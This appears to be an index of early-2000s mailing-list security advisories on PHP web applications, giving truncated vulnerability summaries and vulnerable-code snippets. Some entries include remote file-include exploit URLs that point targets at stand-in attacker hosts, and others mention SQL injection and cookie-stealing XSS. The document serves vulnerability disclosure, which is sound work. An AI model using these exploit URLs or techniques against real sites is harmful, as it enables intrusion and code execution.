BBCode XSS in XOOPS CMS

Informations : ° Language : PHP Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked) Safe Version : 2.0.3 Website : http://www.xoops.org Problem : BBcode XSS PHP Code/Location : °°° This hole can be used in modules : - Private Messages - News - NewBB (forum)

pMachine (PHP) : Include() Security Hole

Informations : ° Language : PHP Version : Free 2.2.1 Website : http://www.pmachine.com Problem : Include() Security Hole PHP Code/Location : °°° This will work if register_globals is ON *OR* OFF. /pm/lib.inc.php : -

Re: PHP-Nuke block-Forums.php subject vulnerabilities

I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or ", like this : "> What do yo

PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again

Informations : °° Language : PHP Website : http://www.phpnuke.org Version : 6.0 & 6.5 RC2 Modules : Forums, Private_Messages Problem : SQL Injection PHP Code/Location : °°° /modules/Forums/viewtopic.php :

PHP-Nuke 6.0 (& 6.5?) : Serious SQL Injection Security Holes

Informations : °° Language : PHP Website : http://www.phpnuke.org Versions : 6.0 (& 6.5?) Modules : Members_List, Your_Account Problem : SQL Injection PHP Configuration : This will work if magic_quotes_gpc=OFF. PHP Code/Location : °°° /modules/Members_List/index.php : --

GTcatalog (PHP)

Informations : °° Version : 0.9 Website : http://www.geektweaked.com Problem : - Informations Disclosure (Admin Password) - File Including PHP Code/Location : °°° password.inc : index.php : [..

WebChat (PHP)

Informations : °° Version : 0.77 Website : http://www.webdev.ro Problem : File Including PHP Code/Location : °°° defines.php : --- Exploits : °° http://[target]/defines.php?WEBCHATPATH=http://[attacker]/ with : http://

Invision Power Board (PHP)

Informations : °° Website : http://www.invisionboard.com -- Version : 1.0.1 Problem : phpinfo() -- Version : 1.1.1 Problem : File Including PHP Code/Location : °°° v1.0.1 : phpinfo.php : -- -- v1.1.1 : ip

Security Patchs for PHP Products #2

Here is a new list of security patchs for some security holes in PHP products (by phpSecure team & others). The most of the security holes have been published on securityfocus (vuln-dev or bugtraq). - SPGpartenaires 3.0.1 : http://www.phpsecure.org/index.php?id=65&zone=pDl More details : h

WihPhoto (PHP)

Informations : °° Version : 0.86-dev Website : http://www.wihsy.com problem : All files from the hard disk can be send by mail PHP Code/Location : °°° util/email.php : function CMailFile($subject,

Myguestbook (PHP)

Informations : °° Version : 3.0 Website : http://www.tefonline.net/ Problems : - XSS -> admin infos recovery - Access to admin pages PHP Code/Location : °°° If pseudo = [SCRIPT], e-mail = >[SCRIPT] or message = [SCRIPT] [SCRIPT] will be executed on index.php, /admin/us

Kietu ( PHP )

Informations : °° Website : http://kietu.free.fr Version : 2.0, 2.3 Problem : Include file PHP Code/Location : °°° hit.php : -- if (!get_cfg_var("register_globals")) { $kietu["remote_addr"] = $HTTP_SERVE

D-Forum (PHP)

Informations : °° Website : http://www.adalis.fr/adalis.html Versions : 1.00 -> 1.11 Problem : Include file PHP Code/Location : °°° /includes/header.php3 : --- if ($my_header!="") { include ($my_header); } else { ?> ... --

DotBr (PHP)

Informations : °° Website : http://dotbr.org Version : 0.1 Problems : - phpinfo() - Informations disclosure - System commands execution PHP Code/Location : °°° foo.php3 : - - config.inc : - SQL password - SQL host - SQL user

php-Board (php)

Informations : °° Website : http://www.hp-planet.de Version : 1 Problem : Informations disclosure PHP Code/Location : °°° login.php : - function passwd2($user) { $password="nicht registriert"; if (file_exists("user/".$user.".tx

myphpPagetool (php)

Informations : °° Version : 0.4.3-1 Website : http://myphppagetool.sourceforge.net/ Problem : Include file PHP Code/Location : °°° In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and help9

phpMyShop (php)

Informations : °° Version : 1.00 Website : http://www.pc-encheres.com Problem : SQL Injection PHP Code/Location : °°° compte.php : --- session_start(); if (isset($achat)) { session_register("achat"); } els

Re: dotproject Remote Code Execution Vulnerability : Patch

A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english version) . From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: dotproject Remote Code Execution Vulnerability Date: Wed, 29 Jan 2003 04:02:24 -080

Re: Zorum Portal (PHP)

A patch has been created for this hole and can be found on http://www.phpsecure.org/. From: MGhz <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: Zorum Portal (PHP) Date: 22 Jan 2003 19:45:26 - Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file

MyRoom (PHP)

Informations : °° Website : http://www.plansbiz.net Version : 3.5 GOLD Problems : File copy/upload PHP Code/Location : °°° room/save_item.php : if($name == "" OR $ref == ""){ echo "You are fogot e

vSignup, vAuthenticate (PHP)

Informations : °° --- Product : vAuthenticate Version : 2.8 --- Product : vSignup Version : 2.1 --- Website : http://www.beanbug.net Problem : SQL Injection PHP Code/Location : °°° chgpwd.php : --

phpPass (PHP)

Informations : °° Version : 2 Website : http://www.agames-net.com Problem : SQL Injection PHP Code/Location : °°° accesscontrol.php : [...] session_register("uid"); session_register("pwd"); [...] $sql = "SELECT * FROM us

E-theni (PHP)

Informations : °° Version : ? Website : http://www.theni.freesurf.fr Problems : - Include file - phpinfo() PHP Code/Location : °°° /admin_t/include/aff_liste_langue.php : - require ($rep_include."para_langue.php");

OpenTopic security hole

Informations : °° Product : OpenTopic Website : http://www.infopop.com Version : 2.3.1 Problem : XSS (script injection) -> Cookies recovery Location/Exploit : °° The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ). XSS to get cookie : [I

N/X (PHP)

Informations : °° Website : http://nxwcms.sourceforge.net/ Version : 2002 PreRelease 1 Problem : Include file PHP Code/Location : °°° nx/common/cds/menu.inc.php : --- [...] require_once $c_path."common/lib/launch.

PEEL (PHP)

Informations : °° Version : 1.0b Website : http://www.mapetite-entreprise.com Problem : Include file PHP Code/Location : °°° modeles/haut.php : --- $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; req

SPGpartenaires (PHP)

Informations : °° Version : ? -> 3.0.1 Website : http://www.scripts-php-gratuits.com Problem : SQL Injection -> Access to member's accounts PHP Code/Location : °°° modif/ident.php : -- [...] $sql="SELECT nomsite FROM SPG

WAnewsletter (PHP)

Informations : °° Website : http://www.phpcodeur.net Versions : 2.0beta -> 2.1.0 Problem : Include file PHP Code/Location : °°° newsletter.php 2.1beta -> 2.1.0 : if( !empty($HTTP_POST_VARS['action']) ) { $action =

Security Patchs for PHP Products

PHPSecure made some patchs for security holes in PHP products. Here is the list : - ALP - Banner Ad 2.0 : http://www.phpsecure.org/index.php?id=1&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=ALP - Tight Auction 3.0 : http://www.phpsecure.org/index.php?id=6&zon

PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

Informations : °° Product : PHP-Nuke Version : 6.0 Website : http://www.phpnuke.org Problems : - Path Disclosure - XSS Developpement : °°° The majority of the PHPNuke's files are includes in modules.php or index.php. To prevent the direct access, PHPNuke made two kinds o

MyPHPLinks (PHP) : SQL Injection

Informations : °° Website : http://www.myphpsoft.net Version : ? -> 2.1.9, 2.2.0CVS Problem : SQL Injection -> Admin access PHP Code/Location : °°° admin/auth/checksession.php --- [...] if($idsession!=''){ $db

Re: XSS and Path Disclosure in UPB

Anything about UPB was already wrote (1.1 & 1.0beta) : http://www.frogsecure.com/tutos/UPB.txt From: "euronymous" <[EMAIL PROTECTED]> Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: XSS and Path Disclosure in UPB Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK) =:=:=:

Thatware (PHP)

Informations : °° Versions : ? -> 0.3 -> 0.5.3 Website : http://www.thatware.org Problems : - Include file - SQL Injection PHP Code/Location : °°° artlist.php (v0.5.2, 0.5.3) : - include $root_path.'thatfile.php'; ---

FreeNews & News Evolution (PHP)

Informations : °° Problem : Include files a) --- Product : Freenews Version : 2.1 Website : http://www.prologin.fr -- b) --- Product : News Evolution Versions : 1.0, 2.0 Website : http://www.phpevolution.net --

Immobilier 1 (PHP)

Informations : °° Version, Website : ? Problems : - phpinfo() - SQL Injection PHP Code/Location : °°° agentadmin.php : -- [...] } elseif ($agentname != "" OR $current_user != "") { $sql = "SELECT id FR

Web Server Creator - Web Portal 0.1 (PHP)

Informations : °° Website : http://webcreator.com02.com Tested version : 0.1 Problem : Include file PHP Code/Location : °°° news/include/customize.php : -- $langfile = $l; include $l; ?> -- index.php :

dobermann FORUM (php)

Informations : °° Product : dobermann FORUM version : 0.5 website : http://www.le-dobermann.com Problem : Include file PHP Code/location : °°° entete.php enteteacceuil.php topic/entete.php : -- include $subpath."banniere.php"; ?>

phpnewsDev

Informations : °° Language : PHP Tested version : 1 Problem : bad use of include() PHP Code : °° ---Include/variables.php3--- $Mac="localhost"; $Uti="root"; $Mot=""; $Bd="phpnews"; $AnneeDeDemarrage="2000"; $MoisDeDemarrage="8"; $NbNouvelles=5; require("$Include/frenc

gBook

Informations : °° Language : PHP Tested version : 1.4 Problem : Admin access PHP Code : °° /gb/index.php : -- include("config.inc.php"); if($action == "login") { if($user == $loginu && $pw == $loginpw) { setcookie("login

SSGbook (ASP)

Informations : °° Product : SSGbook Langage : ASP Tested version : 1 Website : http://www.script-shed.com Problem : Cross Site Scripting PHP Code / location : ° - config.asp -- fString = doCode(fString, "[img]","[/img]","") fStri

phpSecurePages & Killer Protection ( PHP )

1) Informations : °° Product : phpSecurePages Tested version : 0.27b Website : http://www.phpsecurepages.f2s.com Problem : include file PHP Code : °° -- checklogin.php - if (!$login) { // no login available include($cfgProgDir .

phpMyNewsletter

Informations : °° Product : phpMyNewsletter Tested version : 0.6.10 Website : http://gregory.kokanosky.free.fr/phpmynewsletter/ Problem : include file PHP code : °° /include/customize.php /include/customize.php Exploit : ° http://[target]/include

MySimpleNews (PHP)

Informations : °° Language : PHP Tested version : 1 Website : ? Comment : Very simple code. a) Writing PHP code in a PHP file and execution of this code. Problem : ° - users.php - "); fwrite($fp,"$MESS\n"); fclose($fp); ?> - u

Multiple Web Security Holes

I sent this three times to webappsec but without resultats. I try so on bugtraq, although that is less appropriate. - Five products in PHP are vulnerable to various holes. 1) TightAuction Website : http://www.tightprices.com Tested Version : 3

Security holes in LokwaBB and W-Agora

Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do it :) I just hope that doesn't give more work to the webmasters. Product 1 : *** W-Agora 4.1.3 http://www.w-agora.net Problem : - Including file Exploits : - With a file http://www.attacker.com/dbaccess.txt :